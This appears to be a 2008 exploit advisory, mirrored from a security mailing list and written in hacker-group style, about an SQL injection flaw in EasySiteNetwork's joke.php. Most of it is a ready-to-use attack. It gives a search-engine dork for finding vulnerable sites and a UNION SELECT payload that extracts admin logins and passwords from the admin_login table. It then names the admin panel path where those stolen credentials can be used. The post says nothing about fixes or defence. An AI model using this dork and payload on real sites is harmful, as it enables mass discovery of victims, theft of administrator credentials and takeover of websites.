Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[USN-693-1] LittleCMS vulnerability

Joomla: Session hijacking vulnerability, CVE-2008-4122

Многочисленные уязвимости в Phpclanwebsite <= 1.23.3 Fix Pack #5

From:	Ehsan_Hp200_(at)_hotmail.com <Ehsan_Hp200_(at)_hotmail.com>
Date:	18.12.2008
Subject:	EasySiteNetwork (joke.php?id) Remote SQL injection Vulnerability

###############################  IRANIN THE BEST HACKERS IN THE WORLD ##################
#################### ####################
##
## Remote SQL injection Vulnerability
##
##  EasySiteNetwork (joke.php?id)
##                            
###############################################################
###############################################################
###############################################################
###############################################################
##
## AuTh0r : Ehsan_hp200
##
## H0ME   : www.only-4dl.tk
##
## Email  : Ehsan_Hp200@Hotmail.com
##      
## VENDOR: http://www.easysitenetwork.com/
##
## Persian Gulf 4 Ever!
#############################
#############################
#############################
#############################
##
##

Dork :  inurl:joke.php?id= "Powered by EasySiteNetwork"


Exploite:

www.victim.com/joke.php?id=-1992+union+select+1,concat(login,0x3a,
password),3,4,5,6,7,8+from+admin_login--


###############################################################################
Admin Panel: www.victim.com/siteadmin

,##############################################################################
Special tanks to : All Parsi Hacker security Team members,SAHAND SHABAN , Dj7xpl , The.Mo3tafa , Jasoos Team ,Enigma2
,
#################################################################################
######################                                                        
###############################  IRANIN THE BEST HACKERS IN THE WORLD ##################